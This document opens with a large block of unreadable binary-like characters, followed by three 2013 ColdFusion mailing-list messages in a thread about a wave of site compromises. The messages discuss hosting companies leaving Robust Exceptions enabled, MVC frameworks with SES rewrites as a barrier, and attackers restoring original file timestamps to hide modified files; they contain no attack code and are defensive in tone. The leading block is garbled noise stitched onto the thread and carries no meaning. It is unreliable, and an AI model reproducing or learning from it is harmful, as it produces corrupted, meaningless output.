YsK˜ُ;/׻áº8'¹ïVŒcKWŠˆyó±ý•:5IY4)ÄAý!x²Í׻áº8'¹ïVŒcKWCrFõîZ½›
 
X·òØ⟬Mͼ¿%V#‚6ŸÂ7Ì 
šð×÷¥ºBú÷ƒj±­׻áº8'¹ïVŒcKWå}°mb¿› 
X·ï3Êõ$´ÛÎͼ¿%V#‚6ŸÂ7Ì Íeh' wðô޲©é;gZCE
¸£whpî®l‘XFLõR±, 8;Îù]¾¿¼0î$èìWÄçåöbyœ©E 
¦¨Y¢p$¸XëÄn
ŒÑng»‚·N0ì\¸ÿꬃ©ô³¥pEߵÒ/´—ýùßÄYD¦ŠŸš°žWܳ§›YªØåc×S¶‹HI-—Œ0uü˜ÒKþÝÍR‘•B‡ÑÄc‹)¦ͼ¿%V#‚6ŸÂ7Ì
 
«.Z–éÝ/ƒœ_N.G…
|J\¸ÿꬃ©ô³¥pEߵÒ/_]\Õù–öçOÖԉù¼DZ¡œBé0¦fTm{$5fIHpOՅ
ãDøS‹4C¬Û2£3†.­æalW][÷* 
ó–2¢žôà€X¨Ĝ—UNM±…§é¥÷–׻áº8'¹ïVŒcKWZ¸;å´ü› 
X·;ËQ|dKͼ¿%V#‚6ŸÂ7Ì 
¤PÖ¯©õÞS5ñÞBœ£P1²¿”žWܳ§›YªØåc×S¶‹HIxœ)«%Pý²v1°×á¦fTm{$5fIHpOդaÏQz]¬[ç@ºÐìéfæ›.DÁgä/WÄçåöbyœ©EÂ
 
¦¨Yn.—‹ÉrHýSámí.Z׻áº8'¹ïVŒcKW»Ê.Hú®c:5IY4)Ä4Çݪ'H—Nî®l‘XFLõR±,
 
¥ã‰J¥3Š±‹ŽTEWÄçåöbyœ©E 
¦¨YºùÞØÅ
ԩÈ[ÑîX¢EáYeÆlúîïlžWܳ§›YªØåc×S¶‹HI{±ñévø›9}¦
 _¦fTm{$5fIHpOÕn˜aîó(Wœ†+úÞ 

¥N—Î\#ÆWÄçåöbyœ©E 
¦¨Y)‚ÂO—ÇpÔ)æÞÆØ׻áº8'¹ïVŒcKWôåßAãåÑ:5IY4)ÄßJ֔¥ô׻áº8'¹ïVŒcKWõºþðA\õ›
 
X·Ë!þFs¸!eͼ¿%V#‚6ŸÂ7Ì 
þﱕþw0wQЀQ”wGݑeSyǓð¯¦fTm{$5fIHpOբSÄò 
¤qòðë–1ˆxO…­æalW][÷* 
9®Fó“BWQɄl0ʏËÎvñ™óÒ\¸ÿꬃ©ô³¥pEߵÒ/
WHšq˜²¦¹ÿÀomÀòžWܳ§›YªØå«#}yµ'X˜éâ¡[V8cÊ 
I¼ŠL“dӽóývö­æalW][÷* 0–I
™ñ}_p6R¯

]Ðî®l‘XFLõR±, Zq٭ZTgW¥åø[\…f´qêWÄçåöbyœ©E 
¦¨Y0‰
Fã‘4÷ÉzèԶA¢׻áº8'¹ïVŒcKW4ðGTê¤+·:5IY4)ÄHmûŠ=Oќ±ì{E
 
Ü2ͼ¿%V#‚6ŸÂ7Ì 
~×ëБ´^'×\¸ÿꬃ©ô³¥pEߵÒ/‡¼tmAZmgäi£Ãm6lü“ƒ­æalW][÷*
 
b²?ÉÚ r;ñ}_ÒÊ6wÝuÎdî®l‘XFLõR±, 
ûýz†.œi­½$þ—*j9 
'‚¨žWܳ§›YªØå«#}yµ'XΞQ¿(վ÷—åئfTm{$5fIHpOÕÑjr$¿ßÓÀûI£ä£G
 
ër’‚}Û+DžWܳ§›YªØå«#}yµ'X{±ñévøTùdv§òi˜¦fTm{$5fIHpOÕØî¯Tȯûk.1
 
L½ð¹žWܳ§›YªØå«#}yµ'X:6ôԸTœ¼/*²-¦fTm{$5fIHpO՝²;É70yÎ\^«år‘ƒr2þOTWÄçåöbyœ©EÂ
 
¦¨Y5 w–Ëٞ
ÒóìyÞU2׻áº8'¹ïVŒcKWýº²´ˆ…
?:5IY4)ă^(·:;h­æalW][÷* ­E3 
)¨hkeF²Ód™1OOåò î®l‘XFLõR±, ™YòŽÇ[cÖ 
ûäé‘ÿ¿C|ÑÕq­æalW][÷* À(Êõ#|Q
»s7EH”èyvà²Üaî®l‘XFLõR±,

Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott 

One thing I hate about some hosting companies is that they have Robust
Exceptions switched on, but what concerns me even more is that they don't
care that this is a security risk... If your hosting company is one of
them, get in their ears about having it switched off.

If they refuse then its time for a change.

Also as a caution not a rule, if your lucky enough to have the time, look
into using any framework that supports MVC and SES rewrites, this has
stopped them in their tracks as they are not able to run the uploaded code.
Not with ease at least anyway.

Still I am not sure how they are uploading these files, as there is nothing
in the logs that indicates this. I am guessing that something else on the
server is compromised and because they are able to and do look for
exceptions being displayed to the screen they now know where to start
spreading their malware. My guess is there is an exploit still know and not
public that is bypassing all sand boxing at the moment.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell 

  Still I am not sure how they are uploading these files
  as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the 
ORIGINAL creation date on it - 2011 something - although it was altered 
last week. So, a search of all the site files for anything recently 
altered showed nothing.

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott 

That would indicate that they where able to get the file stamp before
modifying it and reapplying the time stamp Extreme long shot, but who
knows how they are doing this.

-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote:


   Still I am not sure how they are uploading these files
   as there is nothing in the logs that indicates this.

 For mine in the previous message, the altered file still had the
 ORIGINAL creation date on it - 2011 something - although it was altered
 last week. So, a search of all the site files for anything recently
 altered showed nothing.

 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm